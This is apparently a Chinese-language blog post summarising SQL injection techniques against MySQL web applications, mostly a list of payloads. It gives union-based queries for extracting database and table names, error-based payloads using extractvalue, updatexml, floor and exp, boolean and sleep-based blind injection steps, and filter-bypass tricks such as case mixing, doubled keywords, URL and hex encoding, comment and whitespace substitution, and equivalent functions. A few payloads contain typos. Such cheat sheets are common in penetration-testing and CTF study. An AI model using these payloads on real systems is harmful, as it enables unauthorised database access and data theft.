SQL注入利用及绕过总结
注入方法
普通查询注入
判断漏洞是否存在
数字型
例如后端SQL语句长这样
1 | select * from article where artid = 1 and xxxxx; |
GET的请求参数是artid,可以在参数值后面输入单引号,此时数据库无法执行就会报错,说明存在SQL注入
1 | ?artid=1' |
通过and 1=1 ,and 1=2 判断
1 | ?artid=1 and 1=1 |
需要注意的是,在测试删除功能时尽量不要使用and 1=1,否则可能会将数据全部删除
字符型
与数字型类似,只是要注意单引号/双引号/括号的闭合,可以在最后加上注释符把后面的闭合符号和语句直接注释掉
判断字段数
1 | ?artid=1 order by 4 |
order by 无法使用时,可以通过SELECT NULL判断
1 | ?artid=1 SELECT NULL, NULL, NULL, NULL |
暴库名
1 | ?artid=-1 union select 1, database(), 3, 4 |
暴表名
1 | ?artid=-1 union select 1,group_concat(table_name), 3, 4 from information_schema.tables where table_schema=xxx |
报错注入
很多Web程序没有内容回显,这样就需要我们利用报错注入的方式来进行SQL注入了
报错常用的函数
floor
1 | id=1 and select count(*),floor(rand(0)*2) x from xxx group by x; |
extractvalue
1 | id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); |
updatexml
1 | id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); |
exp
1 | id=1 and exp(~(select * from(select user())a)); |
盲注
Boolean盲注
盲注常用的函数
1 | length() # 返回字符串的长度 |
注入步骤
1.判断数据库名字的长度
1 | ?id=1 and length(database()) > 7 |
2.猜解数据库名
1 | ?id=1 and substr(database(), 1, 1) = 's' |
可以使用burp或者python脚本进行遍历猜解
时间盲注
注入方法
1.判断注入点
根据页面回显判断
1 | 1" and 1=1-- # 页面返回有数据 |
用sleep()判断,如果响应延时了5s说明存在时间盲注
1 | " and sleep(5)-- |
2.猜解当前数据库名称长度
1 | " and if((length(database()))=12,sleep(5),1)-- |
3.用ASCII码猜解当前数据库名称
1 | " and if(ascii(substr(database(),1,1))=107,sleep(5),1)-- |
绕过方法
注释符
1 | '#', '--+', '-- -', '%23', '%00', '/**/' |
“and、or” 过滤
1 | # 可以使用"&&"和"||"代替 |
关键词过滤
大小写绕过
1
2id=-1' UnIoN SeLeCT xxx
双写绕过
适用于将关键词置空的场景
1
2id=-1'UNIunionONSeLselectECT1,2,3–-
编码绕过
可以使用URL,hex,ASCII等编码绕过
例如’or 1=1
1
27%20%4F%52%201%3D%31%20%2D%2D
注释绕过
内联注释/**/将关键词分隔开
1
2id=1' UN/**/ION SE/**/LECT database() --
空格过滤
内联注释代替空格
1
id=1/**/and/**/1=1
括号嵌套
1
select(group_concat(table_name))from(information_schema.taboles)where(tabel_schema=database());
制表符、换行、不可见空格
%09(制表符), %0a(换行), %0b(垂直制表符), %0d(回车), %a0(不间断空格)
反引号
1
union(select`table_name`,`table_type`from`information_schema`.`tables`);
比较符号 “=、<、>”过滤
in()
1
ascii(substr(select database(),1,1)) in(115); //根据回显判断
like
like代替’=’
正则表达式
1
select database() regexp '^s'; //根据回显判断
逗号过滤
逗号被过滤时可以使用from…for…
1 | select substr(select database() from 1 for 1); |
limit中的逗号可以替换成offset
1 | select * from users limit 1 offset 2; |
需要注意,limit 1,2 指的是从第一行往后取2行(包括第一行和第二行);而limit 1 offset 2是从第一行开始只取第二行
False注入
1 | select * from users where username = 0; # 查询表中所有数据 |
其实是利用了mysql的隐式类型转换,当字符串与数字比较时,会将字符串转换为浮点数,转换失败并返回0,0 = 0返回True,就会返回表中所有数据
绕过引号构造0的方法
1 | select * from users where username = ''+''; |
等价函数
- if()=> case…when..then…else…end
1 | 0' or if((ascii(substr((select database()),1,1))>97),1,0)# |
- sleep() => benchmark()
benchmark()函数用来测试执行速度,第一个参数代表执行的次数,第二个参数代表要执行的表达式或函数,根据执行的时间来判断
- concat_ws() => group_concat()
1 | select group_concat(database()); |
- substr() => substring() / lpad() / rpad() / left() / mid()
- 本文作者: 林姜
- 本文链接: http://example.com/2025/02/04/SQL注入利用及绕过总结/